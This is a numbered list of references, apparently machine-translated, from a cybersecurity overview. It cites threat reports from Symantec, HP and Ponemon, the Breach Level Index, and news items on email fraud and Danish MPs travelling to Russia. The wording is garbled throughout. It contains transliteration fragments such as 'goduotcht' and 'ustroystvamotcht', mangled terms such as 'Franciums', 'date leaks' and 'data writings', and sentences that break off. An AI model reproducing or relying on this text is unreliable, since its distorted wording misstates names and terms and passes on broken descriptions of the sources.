  23. Internet Security Threat Report
  24. 'Nigerian princes' snatch billions from Western biz via fake email – the Interpol
  25. Goodbye smartphone - Danish MPs leave gadgets at home during Russia trip
  26. Cyber security of 2016-2017: from results to forecasts
  27. Internet promotion – one of the main cyberthreats of 2017
  28. the Research "2016 Cyber Resilient Organization" conducted by Ponemon Institute with assistance of Resilient represents the overview of the best practices on opposition to cyberthreats, namely, capabilities of the enterprises to support smooth operation and to save the integrity in the face of cyber attacks. The insights received during the poll more than 2.4 thousand specialists in the field of IT and security from around the world including from USA Great Britain Franciums Germany, by the UAE, Brazil and Australia are given in a global research.
  29. of Club.CNews: The main 8 trends in the field of cybercrimes (according to police of the European Union as of 2016)
  30. of Breach Level Indexindeks BLI
  31. represents the centralized global database in which information on all date leaks recorded in the world is accumulated and the level of threat of each of such leaks by several different criteria, including on data type and by the number of the compromised data writings, on a leak source is analyzed and also on whether there was a compromised information it is ciphered. Each leak an assessment is given, thus, the BLI index represents the comparative table of leaks allowing to distinguish small and insignificant incidents from really large and significant. The data which entered the BLI database are based on publicly available information on leaks. More detailed information is provided to the address
  32. goduotcht HP Cyber Risk Report is published since 2009. By its preparation specialists of HP of Security Research use a number of internal and external sources, including HP Zero Day Initiative, estimates of HP of Fortify on Demand, HP Fortify Software Security Research, Reversing Labs and the National Vulnerability Database database. The detailed description of methodology is provided in the report.
  33. the Source
  34. ustroystvamotcht about threats of Internet security is based on the real, empirical data collected by the global Symantec Global Intelligence Network analytical network, original researches and active monitoring of communications of hackers. The report allows to look globally and objectively at Internet security status. Volume 16 of the report covers the period from January to December, 2010.
  35. CRN
  36. [ protection Methods
  37.  : solutions which allow to resist to cyber attacks]